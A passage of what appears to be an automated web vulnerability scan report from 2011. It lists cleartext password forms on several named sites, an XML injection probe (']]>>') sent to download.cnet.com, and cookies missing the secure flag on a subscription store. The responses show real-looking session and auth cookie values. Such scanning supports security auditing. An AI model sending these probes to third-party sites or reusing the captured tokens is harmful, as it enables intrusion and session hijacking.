Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 34233

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Whitepapers and tech resources from The Register</title>
<link rel="stylesheet" href="/
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.7. http://whitepapers.theregister.co.uk/search/

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:35 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24426

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Search for ...... ... Reg Whitepapers</title>
<link rel="stylesheet" href="/style_picke
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/search/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.8. http://www.43things.com/person/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /person/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>


<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

6.9. http://www.sentinelinvestments.com/advisor-login

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /advisor-login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /advisor-login HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...
</DIV>

       <form method="post" action="/inc/form_scripts/advisor_login_script.php">
   
       <DIV ID="advisor_login_topleft_form_email">
...[SNIP]...
<DIV ID="advisor_login_topleft_form_password">Password:
<input name="password" id="password" type="password" value="" /></DIV>
...[SNIP]...

6.10. http://www.tukaiz.com/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukaiz.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</h3>
                   <form action="http://www.tukaiz.com/index.php" method="post" name="login" >
   
   <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<br />
           <input type="password" id="mod_login_password" name="passwd" class="inputbox" size="10" alt="password" />
           <br />
...[SNIP]...

7. XML injection

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /8300-2007_4-12.html]]>> HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:45:50 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:51:50 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:15:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowLat=1294803950489; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:45:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:45:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:45:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=962
Connection: Keep-Alive
Content-Length: 105058

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Software news, tips an
...[SNIP]...
<p>Click this link to view as XML.</p>
...[SNIP]...

8. SSL cookie without secure flag set
There are 21 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Allure HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:43 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:23 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29783


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.2. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:38 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:29 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 26827


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.3. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_BonAppetite HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:41 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29951


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Brides HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:39 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29610


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:13 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:52 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:14 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30231


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Details HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:07 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:59 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27507


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
